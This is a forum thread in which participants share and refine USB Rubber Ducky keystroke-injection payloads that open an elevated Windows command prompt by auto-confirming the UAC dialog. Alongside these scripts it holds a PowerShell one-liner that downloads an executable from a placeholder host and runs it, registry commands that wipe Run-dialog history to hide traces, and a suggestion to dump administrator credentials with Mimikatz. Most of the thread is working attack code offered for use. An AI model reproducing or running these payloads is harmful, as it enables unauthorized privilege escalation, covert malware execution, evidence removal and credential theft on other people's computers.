Jump to content

[Payload] Faster UAC Bypass


Darren Kitchen
 Share

Recommended Posts

The duck is pretty good at bypassing UAC. Let's make it better.

REM *********************************
REM Payload: Old Method to Bypass UAC
REM Target: Window 7
REM Author: Darren Kitchen
REM *********************************
GUI
DELAY 500
STRING cmd
DELAY 3000
MENU
DELAY 2000
STRING a
REM *************************************************************
REM Depending on Windows Version an ENTER could be necessary here
REM *************************************************************
DELAY 3000
LEFT
ENTER
DELAY 500
STRING echo Admin Prompt in 9 seconds

Not bad. Let's shave another 2 seconds off...

REM ********************************
REM Payload: Less Finicky UAC Bypass
REM Target: Window 7
REM Author: Darren Kitchen
REM ********************************
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING copy con sudo.cmd
ENTER
STRING @echo Set objShell = CreateObject("Shell.Application") > %temp%\sudo.tmp.vbs
ENTER
STRING @echo args = Right("%*", (Len("%*") - Len("%1"))) >> %temp%\sudo.tmp.vbs
ENTER
STRING @echo objShell.ShellExecute "%1", args, "", "runas" >> %temp%\sudo.tmp.vbs
ENTER
STRING @cscript %temp%\sudo.tmp.vbs
ENTER
CTRL z
ENTER
STRING sudo.cmd cmd
ENTER
DELAY 3000
ALT y
DELAY 500
STRING echo Admin Prompt in 7 seconds

Not bad. Let's shave another 2 seconds off...

REM ********************************************
REM Payload: Fastest UAC Bypass using Powershell
REM Target: Window 7
REM Author: Darren Kitchen
REM ********************************************
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
STRING echo Admin Prompt in 5 seconds

Not bad. Let's shave another 2 seconds off...?

Thoughts?

Link to comment
Share on other sites

BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Which is why....

powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%temp%\bob.exe'); Start-Process "%temp%\bob.exe"

However cool, it still doesn't open a command prompt bypassing UAC.

Link to comment
Share on other sites

I found a website that has a way to turn off UAC by command line. Don't know if UAC will still bug you during the turn off procedure though.

http://www.howtogeek.com/howto/windows-vista/enable-or-disable-uac-from-the-windows-vista-command-line/

Unfortunately, this method requires a reboot. Though it does completely disable UAC rather than just a one off.

Link to comment
Share on other sites

The countermeasure to this is, of course, don't run as admin, so that every time UAC pops up you have to put your admin password in. This is how a corporate desktop should be configured anyway, (or with UAC off and non-admin accounts for the staff).

Link to comment
Share on other sites

Emphasis mine.

Too true Darren I know, last company I was at doing a quick audit, they had Windows 7 and half the staff were running as admin with UAC on, the other half as admin with UAC disabled, because, you know, it's such a bind to click "Yes" every now and again.

Link to comment
Share on other sites

REM ********************************
REM Payload: Less Finicky UAC Bypass
REM Target: Window 7
REM Author: Darren Kitchen
REM ********************************
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING copy con sudo.cmd
ENTER
STRING @echo Set objShell = CreateObject("Shell.Application") > %temp%\sudo.tmp.vbs
ENTER
STRING @echo args = Right("%*", (Len("%*") - Len("%1"))) >> %temp%\sudo.tmp.vbs
ENTER
STRING @echo objShell.ShellExecute "%1", args, "", "runas" >> %temp%\sudo.tmp.vbs
ENTER
STRING @cscript %temp%\sudo.tmp.vbs
ENTER
CTRL z
ENTER
STRING sudo.cmd cmd
ENTER
DELAY 3000
ALT y
DELAY 500
STRING echo Admin Prompt in 7 seconds

Not bad. Let's shave another 2 seconds off...

REM ********************************************
REM Payload: Fastest UAC Bypass using Powershell
REM Target: Window 7
REM Author: Darren Kitchen
REM ********************************************
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
STRING echo Admin Prompt in 5 seconds

Not bad. Let's shave another 2 seconds off...?

Thoughts?

Having powershell Start-Process cmd.exe -Verb runAs as the last run command in the run prompt would make me suspicious if i saw it, is there any way you can clean up after to remove the obvious trace?

Link to comment
Share on other sites

You can delete the entire history from the Run dialog using

reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

or, you can specify what exact command you want removed with this:

for /f "tokens=1 delims= " %%A in ('reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU ^| findstr "powershell Start-Process cmd.exe -Verb RunAs"') do (reg delete HKCU\Software\Microsoft\Windows\CUrrentVersion\Explorer\RunMRU /v %%A /f)

or change "powershell Start-Process cmd.exe -Verb RunAs" to anything you like.

Link to comment
Share on other sites

CONTROL ESCAPE
DELAY 200
STRING cmd
CTRL-SHIFT ENTER
DELAY 2800
ALT y

Another 2 seconds shaved off. ;)

Edit: Better version using run menu, should work when there's a lot of entries in the start menu, and doesn't put an unnecessary "y" in the CMD window if UAC is off.

GUI R
DELAY 200
STRING runas /profile /user:%COMPUTERNAME%\Administrator "cmd"
ENTER
DELAY 2700
ALT y
DELAY 100
BACKSPACE
Edited by SN4T14
Link to comment
Share on other sites

  1. Press the Win keyboard key or click on Vista Start button.

Type cmd into the Start Search textbox.

Press Ctrl+Shift+Enter keyboard shortcut. Ctrl-Shift-Enter is the general keyboard shortcut that triggers elevation to “Run as Administrator”.

Press Alt+C or press Continue to confirm the UAC elevation warning prompt.

http://www.mydigitallife.info/how-to-open-elevated-command-prompt-with-administrator-privileges-in-windows-vista/

Link to comment
Share on other sites

  • 2 months later...

The CTRL+SHIFT+ENTER combo works on the keyboard but how do you code that in Ducky Script? Can Ducky Script handle three keys being pressed simultaneously?

I tried this script earlier and it didn't work:

DEFAULTDELAY 50
DELAY 3000
CONTROL ESCAPE
STRING cmd
CONTROL SHIFT ENTER
ALT Y
EXIT

Link to comment
Share on other sites

  • 3 weeks later...
  • 7 months later...
  • 3 weeks later...

Firstly, when you refer to "Bypass" UAC, what you are really saying is don't bring up the dialog box saying "Do you want to run xyz program as Administrator?". What I think would be better is to get administrator rights from a guest users' perspective, just about guaranteeing that any program would work if you needed to execute it.

If I knew someone who was an administrator, I would simply write a ducky script using the CTRL-SHIFT-ENTER command to elevate Powershell, then use the "Invoke-Mimikatz" command with "-DumpCreds". This would output the administrator password for the computer (providing it is not a Windows 8/8.1 machine).

I know there is a way you can execute a task as another user... so if you knew the administrator password for a computer, you could simply rock up as a guest, and run the task as an admin user. Thoughts?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...